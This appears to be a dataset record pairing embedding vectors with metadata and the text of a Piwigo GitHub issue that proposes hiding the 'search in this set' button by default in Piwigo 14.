-0.0008850631420500576, -0.003274425631389022, -0.008548715151846409, -0.0018114966806024313, -0.020139478147029877, -0.009513438679277897, 0.007555825170129538, -0.0040067704394459724, -0.0154214883223176, -0.017491770908236504, 0.005619336850941181, -0.0256461463868618, -0.005598211660981178, 0.020702820271253586, 0.0008172860834747553, -0.00983031839132309, -0.01632283627986908, -0.0016143270768225193, -0.006858689244836569, 0.00031908045639283955, -0.0010316200787201524, -0.014576475135982037, -0.013984966091811657, 0.02042114920914173, 0.015083483420312405, 0.022012589499354362, -0.009731733240187168, -0.0007076984038576484, 0.0035719405859708786, -0.01206960342824459, 0.0025015906430780888, 0.001125803799368441, -0.010097905993461609, 0.008069874718785286, -0.03022330068051815, -0.0059432582929730415, -0.005077119916677475, -0.02854735776782036, 0.024801133200526237, -0.0048834714107215405, -0.011886516585946083, -0.00878109410405159, 0.019322631880640984, 0.036645397543907166, 0.0023079419042915106, 0.004548986908048391, -0.01623833365738392, -0.00016922266513574868, -0.0095345638692379, -0.013499083928763866, 0.004872908815741539, 0.00358250318095088, -0.00802762433886528, -0.021181659772992134, -0.012287897989153862, 0.023209691047668457, -0.0009620825876481831, -0.008703634142875671, 0.011830182746052742, -0.023364610970020294, -0.030983811244368553, -0.004791927989572287, 0.02954728901386261, -0.005717921536415815, 0.011611887253820896, 0.012111853808164597, 0.0014109957264736295, 0.005661587230861187, 0.009309227578341961, 0.013463874347507954, 0.02316744066774845, -0.003448709612712264, -0.00851350650191307, -0.00524612283334136, 0.028237519785761833, 0.0024822258856147528, 0.01664675772190094, 0.0261249877512455, -0.011259798891842365, 0.0033413225319236517, -0.005629899445921183, -0.0037004530895501375, -0.0036036286037415266, -0.0029223368037492037, 0.009689482860267162, 0.022716768085956573, -0.0013617033837363124, -0.008330420590937138, -0.022322427481412888, -0.029209284111857414, -0.003593066008761525, -0.0012921658344566822, 0.01912546157836914, -0.0038483303505927324, 0.006400974001735449, 0.00181325722951442, -0.004330691881477833, -0.0075769503600895405, 0.0037356619723141193, 0.00031115845195017755, -0.011414717882871628, -0.006893898360431194, 0.003566659288480878, 0.0256461463868618, 0.00706994254142046, -0.03943394124507904, 0.0015192630235105753, -0.007400906179100275, -0.013886380940675735, -0.0005417765933088958, 0.007717785891145468, -0.005717921536415815, -0.008006498217582703, -0.003746224567294121, -0.014942647889256477, 0.002154783345758915, 0.007407947909086943, -0.0005915091605857015, 0.0007631524349562824, 0.015041232109069824, 0.006400974001735449, -0.019759221002459526, 0.005517230834811926, 0.0036934111267328262, -0.008985305204987526, -0.02556164562702179, 0.02901211567223072, 0.014562391676008701, -0.007260070648044348, 0.016660841181874275, -0.02475888282060623, -0.023097023367881775, -0.01623833365738392, 0.017393184825778008, 0.0168298427015543, 0.031011978164315224, -0.008717717602849007, 0.004397588782012463, -0.00037519459147006273, 0.0004894033772870898, 0.004682780709117651, -0.02028031274676323, -0.0126329455524683, 0.0010078541235998273, -0.015984829515218735, 0.002800866262987256, 0.012055519968271255, 0.010435910895466805, -0.010611956007778645, 0.0018502265447750688, -0.007076984271407127, 0.02497013658285141, 0.011562595143914223, -0.052728813141584396, 0.010752791538834572, -0.01732276752591133, 0.00019463906937744468, -0.0012155864387750626, 0.004295483231544495, -0.007224861532449722, 0.0031864033080637455, 0.0052144345827400684, -0.02122391201555729, 0.003355405991896987, -0.008865594863891602, 0.02626582235097885, -0.02556164562702179, 0.035969387739896774, -0.0006245174445211887, 0.011442884802818298, -0.014660976827144623, -0.01980147324502468, -0.0308429766446352, -0.013041367754340172, -0.0033694894518703222, -0.020153561607003212, -0.006981920450925827, -0.020857738330960274, -0.0006812917999923229, -0.004034937359392643, -0.019224047660827637, -0.005844673607498407, 0.02089998871088028, 0.016604507341980934, 0.017984693869948387, -0.010055655613541603, 0.004989097826182842, -0.026899581775069237, 0.015266569331288338, -0.009703566320240498, 0.0037039739545434713, 0.020195811986923218, 0.026462992653250694, 0.010703498497605324, -0.013210371136665344, -0.005045432131737471, 0.0027462923899292946, 0.001054505817592144, -0.03073030710220337, -0.03588488698005676, 0.014027216471731663, 0.012330148369073868, 0.016449587419629097, -0.009316269308328629, 0.0005901887780055404, 0.015956662595272064, -0.010147198103368282, -0.00043659008224494755, 0.005425687879323959, 0.02074507065117359, 0.014548308216035366, -0.004101834259927273, 0.0011838985374197364, -0.028589608147740364, 0.007520616054534912, 0.011633013375103474, -0.00014094554353505373, 0.00264594703912735, -0.004214502405375242, -0.013020242564380169, 0.006302388850599527, -0.005960863083600998, 0.0213084127753973, -0.01094996090978384, -0.009851443581283092, 0.013027284294366837, -0.01012607291340828, 0.01328078843653202, 0.004492652602493763, -0.011203465051949024, -0.0017014689510688186, 0.0062178876250982285, -0.03498354181647301, 0.026462992653250694, 0.001378427492454648, 0.011534428223967552, -0.0050278278067708015, -0.01599891297519207, -0.024772966280579567, -0.021097159013152122, -0.01482997927814722, 0.02370261587202549, 0.016872093081474304, -0.007400906179100275, -0.009055723436176777, -0.0020949281752109528, -0.013569501228630543, -0.0002920136321336031, -0.0029575456865131855, 0.011090796440839767, 0.0061157820746302605, -0.013484999537467957, -0.010611956007778645, 0.0065523721277713776, 0.01844945177435875, 0.020153561607003212, 0.0007490688585676253, -0.0058869244530797005, 0.015590490773320198, 0.012104812078177929, 0.000566862931009382, -0.01673125848174095, 0.018139613792300224, -0.0025086326058954, 0.010703498497605324, 0.01918179541826248, -0.01186539139598608, -0.019942307844758034, 0.021237995475530624, 0.0009039879078045487, 0.0016433743294328451, 0.00012026032345602289, 0.007569908630102873, 0.01729460060596466, 0.014104676432907581, 0.0157313272356987, 0.004362379666417837, -0.02113940939307213, 0.020054977387189865, -0.0018202989595010877, -0.008823344483971596, -0.0025843316689133644, 0.010372535325586796, -0.013203329406678677, -0.013484999537467957, -0.010851375758647919, 0.009661315940320492, 0.008816302753984928, -0.02243509702384472, 0.0047743236646056175, 0.0061157820746302605, -0.014217345044016838, -0.004277878440916538, 0.019435299560427666, -0.0011821381049230695, -0.0028660024981945753, -0.016252417117357254, 0.009337394498288631, -0.005235560238361359, 0.01371033675968647, -0.020787321031093597, -0.009654274210333824, -0.012745613232254982, -0.000608233327511698, 0.027406590059399605, 0.010795041918754578, -0.0410958006978035, -0.012196355499327183, -0.004073666874319315, -0.02815301902592182, 0.0028783257585018873, -0.0025649666786193848, -0.002867763163521886, -0.01933671534061432, -0.00959089770913124, 0.009041639976203442, -0.017055179923772812, 0.022660434246063232, -0.011555553413927555, -0.011337258853018284, -0.0023255462292581797, -0.02125207893550396, 0.022913936525583267, -0.01288644876331091, -0.014344096183776855, 0.004717989359050989, 0.0036229933612048626, 0.008957138285040855, -0.004496173467487097, 0.01578766107559204, -0.0001126133938669227, 0.005453855264931917, 0.011133046820759773, 0.004922200925648212, -0.023068856447935104, -0.0061967624351382256, -0.014562391676008701, 0.007422031369060278, 0.018041029572486877, 0.00038091602618806064, -0.000013780974768451415, -0.025251807644963264, -0.012696321122348309, -0.01450605783611536, 0.00314767356030643, -0.008133250288665295, 0.006714332848787308, 0.005133454222232103, -0.0013247339520603418, -0.010985169559717178, 0.021787254139780998, 0.004066625144332647, -0.01670309156179428, -0.004999660421162844, -0.020153561607003212, -0.00752765778452158, -0.008612091653048992, -0.002739250659942627, -0.008724759332835674, -0.010414785705506802, 0.03999728336930275, -0.008492381311953068, 0.014477889984846115, 0.013766670599579811, 0.008386754430830479, 0.016815759241580963, -0.018322698771953583, -0.007675535045564175, -0.023575864732265472, 0.020674653351306915, -0.009766942821443081, -0.016632674261927605, 0.0020033852197229862, -0.0016099258791655302, -0.000757430971134454, -0.003408219199627638, 0.019083211198449135, 0.020998574793338776, -0.009358519688248634, 0.004144084639847279, -0.020054977387189865, -0.00956273078918457, -0.005284852348268032, -0.03639189526438713, 0.011717514134943485, -0.003115985542535782, 0.0037215782795101404, 0.012562527321279049, -0.006939669605344534, 0.021745001897215843, -0.016872093081474304, -0.005298935808241367, -0.023266026750206947, -0.007696660701185465, 0.018970543518662453, -0.0000013031410617259098, 0.017167847603559494, -0.02166050113737583, -0.015322903171181679, 0.019055044278502464, 0.03132181614637375, -0.012893490493297577, -0.017196016386151314, 0.03154715523123741, -0.004372942727059126, 0.020153561607003212, 0.006710811983793974, -0.008795177564024925, 0.00739386398345232, -0.013175161555409431, 0.006267180200666189, 0.006805875804275274, -0.02830793708562851, 0.0004973253817297518, -0.007140360306948423, -0.0021600646432489157, -0.005482022184878588, -0.016393253579735756, 0.01397792436182499, 0.0033923753071576357, 0.003964519593864679, 0.012703362852334976, 0.004327171016484499, -0.008076916448771954, -0.017365017905831337, 0.009097973816096783, 0.01812553033232689, 0.0074501982890069485, 0.0033976566046476364, -0.007267112378031015, 0.025688396766781807, 0.005235560238361359, 0.014308887533843517, -0.0025015906430780888, -0.00723190326243639, 0.02488563396036625, -0.01081616710871458, 0.0136821698397398, -0.029913462698459625, 0.01249915175139904, 0.011351342312991619, 0.0022410450037568808, 0.028491023927927017, 0.012773781083524227, 0.012048478238284588, 0.016210166737437248, -0.020561983808875084, 0.011280924081802368, 0.004041979089379311, -0.009914820082485676, 0.012231564149260521, -0.006559413857758045, -0.01950571872293949, -0.018252281472086906, -0.01252731867134571, -0.015182067640125751, -0.014562391676008701, -0.010435910895466805, -0.001068589393980801, -0.004915159195661545, 0.0018836748786270618, 0.016097499057650566, 0.01478772796690464, 0.012830114923417568, 0.031659822911024094, 0.011928767897188663, 0.006823480594903231, -0.003142392262816429, -0.023040689527988434, -0.011928767897188663, -0.0003435066028032452, -0.014055383391678333, 0.014886313118040562, 0.012372399680316448, -0.016745341941714287, -0.00014666697825305164, 0.028786778450012207, -0.0076403263956308365, 0.005665108561515808, -0.012872365303337574, 0.025223638862371445, -0.0052954149432480335, -0.0032198517583310604, -0.008738843724131584, -0.009203600697219372, 0.0051933093927800655, -0.00622845022007823, -0.0007600716198794544, 0.009189517237246037, 0.02547714300453663, -0.010597871616482735, 0.004841220565140247, 0.00167682277970016, 0.006876293569803238, -0.0049468474462628365, 0.024223707616329193, 0.02195625565946102, 0.015308819711208344, -0.025927817448973656, -0.02157600037753582, -0.009062765166163445, 0.0017340371850878, 0.007830454036593437, 0.006305909715592861, -0.02074507065117359, -0.005372874438762665, 0.003918747883290052, -0.0021917526610195637, -0.0027621365152299404, -0.01718193292617798, -0.006277742795646191, 0.00785157922655344, -0.016139749437570572, -0.01081616710871458, -0.007914955727756023, -0.014379305765032768, -0.005172184202820063, 0.008252960629761219, 0.02251959778368473, -0.014231428503990173, 0.016491837799549103, -0.0034557513426989317, -0.03129364922642708, 0.00857688207179308, -0.045377202332019806, 0.0008265284122899175, -0.0018854354275390506, 0.014815895818173885, -0.002674114191904664, 0.005915091373026371, -0.012682237662374973, 0.01602708175778389, 0.01688617840409279, -0.006122823804616928, 0.010055655613541603, 0.004084229934960604, -0.010647164657711983, -0.01344274915754795, 0.0200690608471632, -0.0025684875436127186, 0.024308208376169205, 0.031011978164315224, -0.009006430394947529, -0.006172116380184889, -0.017787525430321693, 0.007626242935657501, 0.004130001179873943, -0.019604302942752838, -0.011830182746052742, 0.005334144923835993, 0.009062765166163445, -0.0005294535076245666, -0.0023924431297928095, -0.02275901846587658, 0.0038659346755594015, 0.027012251317501068, 0.0002264370850753039, -0.004770802799612284, 0.003302592784166336, 0.008267044089734554, 0.009865527041256428, -0.0024082872550934553, -0.007337530143558979, -0.0003637517220340669, -0.002413568552583456, -0.006140428129583597, -0.01242873352020979, -0.015956662595272064, 0.017393184825778008, -0.03073030710220337, -0.009217684157192707, 0.012942783534526825, -0.017548104748129845, -0.035997554659843445, -0.005563002545386553, -0.022899853065609932, -0.005598211660981178, 0.004284920170903206, 0.00921064242720604, -0.004446881357580423, -0.005471459589898586, 0.018843790516257286, -0.009619065560400486, 0.022885769605636597, -0.01249915175139904, -0.014562391676008701, 0.013393457047641277, -0.004154647700488567, -0.009062765166163445, -0.010611956007778645, -0.004640529863536358, 0.009802151471376419, -0.0062601384706795216, 0.0077107441611588, -0.0034240633249282837, -0.01880154013633728, 0.006386890541762114, -0.015322903171181679, 0.002593133831396699, 0.01653408817946911, -0.0030895790550857782, -0.007260070648044348, -0.006017196923494339, 0.011963976547122002, -0.009773984551429749, 0.010189449414610863, 0.02429412491619587, -0.02588556706905365, -0.007781161926686764, 0.0038201631978154182, -0.012977992184460163, -0.018702955916523933, -0.01581582799553871, -0.002024510409682989, -0.011210506781935692, -0.02246326394379139, 0.008393796160817146, -0.007499490864574909, 0.006721374578773975, -0.020787321031093597, 0.012689279392361641, -0.006587580777704716, -0.0018291011219844222, -0.020083144307136536, -0.015041232109069824, -0.0063446396961808205, 0.014337054453790188, 0.023392777889966965, 0.02399837039411068, 0.027998099103569984, -0.00851350650191307, 0.019787389785051346, 0.026871414855122566, -0.009640190750360489, 0.012111853808164597, -0.018280448392033577, -0.010055655613541603, -0.001198862213641405, -0.020083144307136536, 0.0038342466577887535, 0.030504971742630005, 0.021378830075263977, 0.01505531556904316, 0.010872500948607922, -0.0005100886337459087, -0.004122959449887276, -0.000326342269545421, 0.007964247837662697, -0.00486234575510025, 0.01880154013633728, -0.007091067731380463, 0.01839311793446541, 0.01982964016497135, 0.012921658344566822, 0.006848126649856567, -0.011231631971895695, 0.007196694612503052, 0.02685733139514923, -0.003975082188844681, 0.024843383580446243, 0.002087886445224285, 0.019139545038342476, 0.007267112378031015, -0.010485203936696053, 0.014914480037987232, 0.009034598246216774, -0.009027556516230106, -0.006918544415384531, -0.0213084127753973, -0.0030526097398251295, 0.006080572959035635, -0.017773441970348358, 0.0010597872314974666, 0.010604914277791977, 0.006721374578773975, -0.01341458223760128, 0.011872433125972748, 0.010182407684624195, 0.02278718538582325, -0.0005012864130549133, -0.005510189104825258, 0.00041612490895204246, -0.01912546157836914, -0.015632741153240204, -0.0026793954893946648, 0.00023017803323455155, 0.008302253670990467, -0.018787456676363945, 0.010738707147538662, -0.0028572003357112408, -0.009985237382352352, 0.010175365954637527, -0.00709810946136713, -0.004967972636222839, 0.008252960629761219, 0.0169706791639328, -0.020491566509008408, 0.0065347678028047085, 0.02771642804145813, 0.007471323944628239, 0.009414853528141975, -0.0015914412215352058, 0.013238538056612015, -0.002529757795855403, -0.011196423321962357, 0.01292870007455349, -0.0026829163543879986, -0.034786369651556015, -0.008541673421859741, 0.0056967963464558125, 0.007745952811092138, 0.02485746704041958, -0.01885787397623062, 0.007682576775550842, 0.0038483303505927324, 0.0071826111525297165, 0.017167847603559494, 0.027167169377207756, 0.020322563126683235, -0.016012996435165405, 0.0018414242658764124, -0.0017560427077114582, -0.008365629240870476, 0.014689143747091293, 0.0021653459407389164, 0.01443563960492611, 0.0060664894990623, 0.008492381311953068, 0.02951912209391594, 0.010858417488634586, -0.0065911016426980495, 0.01564682461321354, 0.011449926532804966, 0.008358587510883808, -0.01699884608387947, -0.018674788996577263, 0.013646961189806461, 0.01995639130473137, -0.008520548231899738, -0.015886245295405388, 0.028462857007980347, -0.0008137651602737606, -0.012963908724486828, 0.01062603946775198, -0.010802083648741245, -0.0023889222647994757, -0.01407650951296091, 0.007661451585590839, -0.0012789624743163586, 0.018224114552140236, -0.0034135007299482822, 0.012287897989153862, 0.002853679470717907, 0.019407132640480995, 0.03512437641620636, -0.011830182746052742, 0.003448709612712264, 0.003293790388852358, 0.005024306941777468, -0.019618386402726173, -0.008823344483971596, -0.006848126649856567, 0.011963976547122002, 0.000979686970822513, -0.006513642147183418, 0.022350594401359558, 0.00032084088888950646, -0.018083279952406883, 0.0002664871863089502, 0.02054790034890175, 0.008837427943944931, 0.01818186417222023, -0.0038131214678287506, -0.00013742464943788946, -0.012125937268137932, -0.006541809532791376, -0.006084093824028969, -0.01977330632507801, 0.0006856928812339902, 0.02658974379301071, 0.009034598246216774, 0.024519462138414383, 0.003711015684530139, -0.020181728526949883, 0.013604709878563881, 0.01750585436820984, -0.0011126005556434393, -0.000396980089135468, -0.001297447131946683, 0.014562391676008701, -0.0055700442753732204, 0.01788610965013504, 0.005763693246990442, -0.013935673981904984, -0.01338641531765461, 0.024632129818201065, 0.025955984368920326, 0.04087046533823013, 0.0043553379364311695, -0.03278650715947151, 0.012562527321279049, 0.007844537496566772, 0.025955984368920326, -0.0016028841491788626, 0.0008722999482415617, 0.0016477754106745124, -0.00098144740331918, 0.008302253670990467, 0.011316132731735706, -0.01691434532403946, -0.005411604419350624, -0.012654070742428303, 0.018576202914118767, 0.017280517145991325, -0.02470254898071289, 0.022308344021439552, -0.02225201018154621, 0.004358858801424503, -0.015308819711208344, 0.01723826676607132, 0.018069196492433548, 0.01482997927814722, -0.002594894263893366, -0.004394067917019129, 0.01019649114459753, 0.008288169279694557, 0.0068833352997899055, -0.01049224566668272, 0.0027815012726932764, -0.022632265463471413, 0.011978060007095337, 0.0014083550777286291, 0.012287897989153862, -0.008900804445147514, -0.015562323853373528, -0.016224250197410583, -0.006319993641227484, -0.01275265496224165, -0.008802219294011593, 0.008090999908745289, -0.008133250288665295, -0.01688617840409279, 0.00410887598991394, -0.009971153922379017, -0.029152950271964073, -0.0017225943738594651, 0.008682508952915668, 0.006953753065317869, -0.028167102485895157, -0.00785157922655344, -0.015182067640125751, 0.01756218820810318, 0.005355270113795996, -0.012745613232254982, 0.004548986908048391, 0.017787525430321693, -0.010872500948607922, -0.0007710744393989444, 0.003887060098350048, 0.011830182746052742, -0.0025966546963900328, -0.0035596175584942102, -0.011527386493980885, -0.002499830210581422, 0.0025491227861493826, -0.003561377990990877, -0.017407268285751343, -0.021801337599754333, 0.006809396669268608, 0.0021037303376942873, 0.000825648196041584, 0.02042114920914173, -0.005334144923835993, -0.024927884340286255, 0.0012895251857116818, 0.012696321122348309, 0.013984966091811657, 0.0028395960107445717, -0.008316337130963802, 0.0007010967819951475, -0.014998981729149818, -0.013041367754340172, -0.006689686793833971, -0.0032656234689056873, -0.01042182743549347, -0.004168731160461903, 0.007999456487596035, 0.007147402036935091, -0.011668222025036812, -0.010647164657711983, -0.009851443581283092, -0.0015870401402935386, 0.004865866620093584, 0.015294736251235008, 0.00001851216802606359, 0.018167780712246895, -0.002061479724943638, 0.0015219036722555757, 0.002299139741808176, -0.0041264803148806095, -0.01844945177435875, -0.015336986631155014, 0.009189517237246037, -0.015689074993133545, 0.0016988283023238182, -0.00802762433886528, 0.0012534360866993666, -0.005707358941435814, -0.001070349826477468, 0.0006680884398519993, 0.0011979819973930717, 0.01809736341238022, -0.013294871896505356, -0.0273643396794796, -0.0004291081859264523, 0.04453218728303909, 0.017984693869948387, 0.01121754851192236, 0.01594257913529873, 0.02125207893550396, 0.013076577335596085, 0.006985441315919161, -0.00399268651381135, -0.03396952524781227, 0.01081616710871458, -0.034842703491449356, -0.0011530907358974218, 0.011611887253820896, 0.01982964016497135, 0.010541537776589394, 0.0063833692111074924, 0.007682576775550842, -0.0020174686796963215, 0.005334144923835993, -0.013956799171864986, 0.008400837890803814, -0.026491159573197365, -0.0004291081859264523, -0.02458987943828106, 0.00003776702214963734, 0.03140631690621376, -0.0018942375900223851, 0.04813757538795471, 0.005055994726717472, 0.018942376598715782, 0.006376327481120825, -0.01167526375502348, 0.007281195838004351, -0.014675060287117958, 0.00841492135077715, 0.00716500636190176, 0.019491635262966156, -0.022984355688095093, -0.00859096646308899, -0.007217819802463055, 0.017083346843719482, -0.009407811798155308, -0.00969652459025383, -0.01909729465842247, 0.006598143372684717, -0.010168323293328285, -0.01344274915754795, -0.0054855430498719215, 0.00013368370127864182, 0.01567499153316021, -0.006619269028306007, 0.007809328846633434, 0.0013467395910993218, 0.011041504330933094, 0.004210981540381908, 0.03892693296074867, -0.04230698570609093, 0.01963246986269951, 0.021745001897215843, 0.006422099191695452, 0.007129797711968422, -0.00080980418715626, -0.002769178245216608, -0.011337258853018284, 0.02709675207734108, 0.019195880740880966, -0.00022445659851655364, -0.003872976405546069, -0.004387026187032461, -0.013006159104406834, -0.02009722776710987, 0.007802287116646767, 0.0036652442067861557, 0.01756218820810318, 0.020111311227083206, 0.00041920569492504, 0.02004089206457138, 0.0033958961721509695, -0.011900600045919418, 0.0035261691082268953, 0.005242601968348026, 0.007330488413572311, 0.03016696684062481, 0.023153357207775116, 0.0030702140647917986, -0.02063240297138691, -0.004207460675388575, -0.011295007541775703, -0.035434212535619736, 0.009006430394947529, 0.045940544456243515, -0.025744730606675148, 0.006918544415384531, 0.01475956104695797, 0.010886584408581257, -0.0052918940782547, 0.020914072170853615, 0.007752994541078806, -0.017463603988289833, 0.00841492135077715, -0.007443156559020281, -0.00818958505988121, -0.00835154578089714, 0.011900600045919418, -0.002443496137857437, -0.003968040458858013, 0.005964383948594332, 0.008140292018651962, -0.017928360030055046, 0.01667492464184761, -0.013823005370795727, -0.012020310387015343, 0.015604574233293533, -0.002042114967480302, 0.00009919000876834616, 0.0000041260404941567685, -0.0012886448530480266, -0.006080572959035635, 0.018956460058689117, -0.004746156744658947, -0.018886040896177292, 0.005640462040901184, 0.001190940267406404, -0.011963976547122002, 0.006270701065659523, 0.0035913055762648582, 0.008048749528825283, 0.020674653351306915, -0.004256753250956535, -0.017012929543852806, -0.0010025728261098266, 0.014900396578013897, -0.004369421862065792, -0.0010562663665041327, -0.017548104748129845, -0.015153900720179081, -0.002834314713254571, -0.011456968262791634, 0.01815369725227356, -0.006327035371214151, 0.013956799171864986, 0.0025526436511427164, -0.017660772427916527, -0.016336919739842415, -0.002448777435347438, 0.02423779107630253, -0.009851443581283092, -0.0322231650352478, -0.0038941018283367157, 0.013808921910822392, -0.006098177749663591, 0.0007068181876093149, -0.012287897989153862, 0.02494196780025959, 0.0030103588942438364, 0.03188515827059746, -0.02491380088031292, -0.002707562642171979, -0.01744951866567135, 0.011104879900813103, -0.004320129286497831, 0.0192099642008543, 0.010013404302299023, -0.013097702525556087, 0.015069399029016495, -0.020533816888928413, 0.01942121610045433, -0.016252417117357254, 0.05982692539691925, -0.0031318296678364277, -0.0017886109417304397, -0.018195947632193565, 0.004137042909860611, -0.01936488226056099, -0.0006716093048453331, 0.001441803527995944, -0.0007090187864378095, 0.0006218767957761884, 0.0015500708250328898, 0.028378354385495186, 0.009316269308328629, -0.015210234560072422, 0.022928019985556602, 0.004228586331009865, 0.018787456676363945, 0.011534428223967552, -0.0007292638765648007, 0.0057390471920371056, 0.00851350650191307, 0.00010656187077984214, -0.007207257207483053, -0.019519802182912827, 0.013055451214313507, 0.007464281748980284, 0.024533545598387718, 0.014104676432907581, -0.03191332519054413, -0.0018167780945077538, 0.013830047100782394, 0.0038941018283367157, -0.014400430954992771, 0.0058869244530797005, -0.025420809164643288, 0.007950164377689362, -0.010471120476722717, 0.002431172877550125, 0.007795245386660099, 0.006601664703339338, 0.009513438679277897, -0.03337801620364189, -0.008076916448771954, 0.04270132631063461, -0.008738843724131584, -0.020083144307136536, -0.0008538152906112373, 0.0022463263012468815, 0.0014382826630026102, 0.007436114829033613, -0.01602708175778389, 0.016336919739842415, -0.0230266060680151, -0.016097499057650566, 0.01341458223760128, 0.017519937828183174, -0.005950300022959709, 0.0054221670143306255, -0.0037849543150514364, -0.003438146784901619, -0.002057958859950304, 0.0026054568588733673, 0.02844877354800701 ]
null
null
null
null
null
null
null
null
null
[ "Piwigo", "Piwigo" ]
In Piwigo 14 we have introduced the feature "search in this set", which can be accessed by either a button or an icon. <img width="504" alt="piwigo-14-search-in-this-set" src="https://github.com/Piwigo/Piwigo/assets/9326959/67ad8d88-118f-4549-b547-e6483166eea4"> With a few months of use, I love this feature BUT I think the button is too obstrusive. We'd better hide it by default. I know it's going to make the feature quite invisible but we have to choose between _"highly visible but obstrusive"_ and _"nearly invisible but slickly integrated"_ (with only the icon)
hide button "search in this set" by default
https://api.github.com/repos/Piwigo/Piwigo/issues/2089/comments
0
2024-01-18T11:16:01
2024-01-18T11:19:48Z
https://github.com/Piwigo/Piwigo/issues/2089
2,088,068,048
2,089
false
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : hide button "search in this set" by default Issue date: --- start body --- In Piwigo 14 we have introduced the feature "search in this set", which can be accessed by either a button or an icon. <img width="504" alt="piwigo-14-search-in-this-set" src="https://github.com/Piwigo/Piwigo/assets/9326959/67ad8d88-118f-4549-b547-e6483166eea4"> With a few months of use, I love this feature BUT I think the button is too obstrusive. We'd better hide it by default. I know it's going to make the feature quite invisible but we have to choose between _"highly visible but obstrusive"_ and _"nearly invisible but slickly integrated"_ (with only the icon) --- end body ---
725
[ -0.02084949053823948, -0.011247166432440281, -0.006308934185653925, 0.0013438437599688768, 0.04445520415902138, -0.04089878872036934, 0.02840687520802021, 0.0655566081404686, -0.00904663372784853, -0.009009587578475475, -0.015233316458761692, 0.015092541463673115, 0.004126924555748701, -0.012610459700226784, -0.008335351012647152, 0.005593946203589439, -0.026110023260116577, 0.0027321428060531616, -0.01541113667190075, -0.03337103873491287, -0.006383026484400034, -0.026732396334409714, -0.043951377272605896, 0.008068619295954704, 0.01238077413290739, 0.014907311648130417, -0.03458614647388458, 0.02019748091697693, -0.012936464510858059, 0.0021449634805321693, -0.007075786590576172, 0.00791302602738142, -0.03568270802497864, 0.004786343779414892, -0.012484502978622913, -0.026599029079079628, 0.029577529057860374, 0.023753896355628967, -0.03417123109102249, 0.027710409834980965, -0.010283970274031162, -0.05192367732524872, -0.000669143395498395, 0.019086100161075592, -0.02954789251089096, 0.010906343348324299, -0.047270700335502625, 0.026154477149248123, 0.002832166850566864, 0.007268425542861223, 0.01424048375338316, -0.03334140405058861, 0.006964648608118296, 0.006557142361998558, -0.05494663119316101, -0.0468854196369648, -0.006646052934229374, -0.030407359823584557, -0.02815496176481247, 0.013944115489721298, 0.01607796549797058, -0.0019930750131607056, -0.02840687520802021, 0.00880212988704443, -0.03348958492279053, 0.012640096247196198, 0.004919709172099829, 0.01827108860015869, -0.018448909744620323, 0.0234427098184824, -0.0037935106083750725, 0.018863825127482414, 0.01914537511765957, 0.0392984002828598, 0.027621500194072723, 0.015203679911792278, 0.02336861938238144, 0.012284454889595509, -0.007779660634696484, -0.0030674089211970568, 0.019367650151252747, 0.02733995020389557, -0.028836607933044434, 0.02492455020546913, 0.04724106192588806, -0.008965132758021355, -0.00021231990831438452, -0.053998254239559174, 0.015885325148701668, 0.002265363000333309, -0.036808907985687256, -0.014944357797503471, -0.029029248282313347, -0.025739561766386032, 0.00989869236946106, 0.02093840017914772, -0.011284212581813335, 0.010891525074839592, -0.03464542329311371, -0.003599019255489111, 0.006846101488918066, -0.035001061856746674, -0.02052348479628563, -0.029681257903575897, 0.017826536670327187, 0.024613363668322563, 0.042973361909389496, -0.009031815454363823, -0.018834188580513, 0.06223728507757187, 0.06194091588258743, -0.018923098221421242, -0.015166633762419224, -0.013655156828463078, 0.019530652090907097, 0.0353863425552845, -0.037875834852457047, -0.006894261110574007, 0.012936464510858059, -0.009676415473222733, -0.0034841764718294144, -0.04119515419006348, 0.016196511685848236, -0.008750265464186668, -0.013521791435778141, 0.010535882785916328, -0.01939728669822216, 0.019189829006791115, -0.008172348141670227, 0.03417123109102249, 0.007994526997208595, 0.02256842516362667, 0.05061965808272362, -0.026747213676571846, 0.02184232324361801, 0.031859561800956726, 0.029251523315906525, 0.010965616442263126, -0.0396244041621685, 0.00900217890739441, -0.04658905416727066, -0.020997675135731697, 0.007838933728635311, 0.03304503485560417, -0.04495902732014656, 0.03126682713627815, -0.050678931176662445, -0.020004840567708015, -0.0024394793435931206, 0.03227447718381882, 0.029325615614652634, -0.03003689832985401, -0.01687815971672535, 0.000586716050747782, 0.041106246411800385, 0.02766595408320427, -0.016048328951001167, -0.02476154826581478, -0.043299369513988495, 0.002795120934024453, -0.009706052951514721, -0.02725103870034218, -0.001029878854751587, 0.0019412105903029442, -0.003599019255489111, 0.02588774636387825, -0.01843409053981304, -0.009328183718025684, -0.006390435621142387, 0.01948619820177555, 0.0027747456915676594, -0.007442541886121035, -0.0007900060154497623, -0.004823389463126659, 0.007049854379147291, -0.03565307334065437, 0.034526873379945755, -0.028866244480013847, -0.0031044550705701113, -0.047033604234457016, -0.045640673488378525, -0.005204963497817516, -0.015099951066076756, -0.008905858732759953, -0.016655882820487022, -0.03959476947784424, 0.013292105868458748, 0.041106246411800385, 0.002672869013622403, 0.01054329238831997, 0.011061936616897583, 0.007779660634696484, 0.03464542329311371, 0.004108401481062174, 0.007979708723723888, -0.02012338861823082, -0.015959417447447777, -0.027028763666749, -0.02759186364710331, -0.027873411774635315, 0.017707988619804382, -0.006397844757884741, -0.039565131068229675, -0.018122904002666473, -0.026821305975317955, 0.03926876187324524, 0.036719996482133865, 0.017144890502095222, -0.011951040476560593, -0.02070130594074726, 0.02157559245824814, 0.008898450061678886, 0.0006228359416127205, 0.005419830325990915, -0.019915930926799774, 0.013425471261143684, -0.005197554361075163, 0.009120726026594639, -0.01575195975601673, 0.012039951048791409, 0.013032783754169941, 0.004945641383528709, -0.012751233763992786, -0.004701137542724609, -0.027962323278188705, 0.008779902942478657, 0.0053605567663908005, -0.01018765103071928, 0.04163970798254013, -0.01209181547164917, -0.025991475209593773, -0.0077944789081811905, -0.025132007896900177, 0.004367723595350981, 0.031355734914541245, -0.006479345727711916, -0.02530982904136181, -0.0059162466786801815, 0.005882905330508947, -0.011550943367183208, 0.028777334839105606, 0.01564823091030121, -0.05103457346558571, -0.014929539524018764, 0.04377355799078941, 0.05995525047183037, 0.012832735665142536, -0.06650498509407043, -0.011224938556551933, 0.010128377005457878, -0.002969237044453621, 0.041906438767910004, -0.031177915632724762, -0.011217529885470867, 0.002402433194220066, -0.011743582785129547, 0.024539271369576454, 0.024450361728668213, -0.015677867457270622, -0.010817432776093483, 0.017322711646556854, 0.06443040817975998, -0.02539873868227005, 0.05548009276390076, -0.017544986680150032, -0.027221402153372765, 